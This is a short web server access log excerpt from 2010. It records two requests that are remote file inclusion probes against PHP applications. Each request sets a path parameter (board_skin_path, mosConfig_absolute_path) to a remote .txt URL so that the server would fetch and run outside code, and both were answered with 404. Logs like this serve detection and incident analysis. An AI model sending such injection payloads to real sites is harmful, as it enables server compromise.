72.44.84.221 - - [25/Feb/2010:06:48:54 -0800] "GET /logs/access_100206.log%20%20//bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:48:56 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
